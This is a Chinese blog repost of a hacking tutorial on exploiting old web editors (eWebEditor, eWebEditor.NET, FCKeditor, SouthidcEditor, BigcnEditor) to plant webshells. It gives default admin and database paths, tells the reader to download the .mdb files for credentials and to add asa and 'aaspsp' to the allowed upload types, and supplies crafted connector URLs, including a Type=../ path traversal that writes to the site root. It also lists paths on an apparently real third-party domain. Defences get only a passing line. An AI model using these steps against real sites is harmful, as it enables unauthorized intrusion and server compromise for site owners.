常见的编辑器漏洞

比如常见的编辑器漏洞有:

ewebeditor 
ewebeditornet   
fckeditor
editor  
southidceditor
SouthidcEditor
bigcneditor


一:ewebeditor为例


1:默认下载下来的后台:


   http://www.test.com/ewebeditor/admin_login.asp

后台如果能进入:

可点击样式管理:

standard 拷贝一份(直接修改改不了)

在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览

在编辑器里点设计     然后直接上传asa大马.

上传后 在代码里可以看到马的位置!

(原理:因为在iis里 网站的属性里 应用程序配置一项   asa扩展名还是用asp.dll来解析的,asp也是   还有 cer cdx )

在cer cdx asa的被删掉   那么马儿就找不到 映射不过去.

可以在拷贝过后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件


2:下载默认数据库

www.test.com/ewebeditor/db/ewebeditor.mdb

然后分析数据库

webeditor_system(1) 就可以看到用户名和密码   如果破解不出来

可以在webeditor_style(14 样式表里

主要看允许上传文件的扩展名(s-fileext s_ingeext)

看到一个小黑客曾经搞过 多了asa aaspsp

可以用他来利用!(后台找不到的情况下也可以用此方法)

可以构造语句:

比如   ID=46     s-name =standard1

构造 代码:   ewebeditor.asp?id=content&style=standard

             ID和和样式名改过后

             ewebeditor.asp?id=46&style=standard1


然后就是进入编辑器   上传asa 或者asp的     得到webshell

二:ewebeditornet 漏洞利用

默认上传地址:

    www.test.com/ewebeditornet/upload.aspx


可以直接上传一个cer的木马

在无法上传的情况下

可以地址栏构造以下代码:   javascript:lbtnUpload.click();

然后查看源代码:

找到uploadsave   找到地址

默认传到uploadfile这个文件夹里

(漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. )

三:fckeditor   漏洞利用

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 选择文件名可定义
上传过后在/userfiles/image/找文件


四:southidceditor

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp


五:bigcneditor

这个页不多说了

原理都差不多!

防范方法很简单就不多讲了,


FCKeditor上传漏洞,

http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:
http://www.xxx.com/UserFiles/all/1.asa
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp

所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了

而 如果这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.

所传的文件就到了网站根目录下了

http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781

本文转自【天堂鸟安全网】:http://www.zhack.cn/Html/?985.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值